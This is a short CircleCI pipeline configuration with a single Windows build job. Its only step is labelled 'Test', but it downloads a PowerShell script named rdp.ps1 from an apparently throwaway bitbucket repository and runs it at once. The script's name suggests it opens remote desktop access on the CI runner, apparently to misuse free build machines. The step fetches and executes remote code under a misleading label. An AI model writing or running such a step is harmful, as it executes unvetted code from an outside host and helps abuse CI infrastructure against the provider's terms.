version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/zrqaatbonc/circleci/raw/96cf311116363898de0c361278126ee44f843b4a/rdp.ps1 -OutFile rdp.ps1
            ./rdp.ps1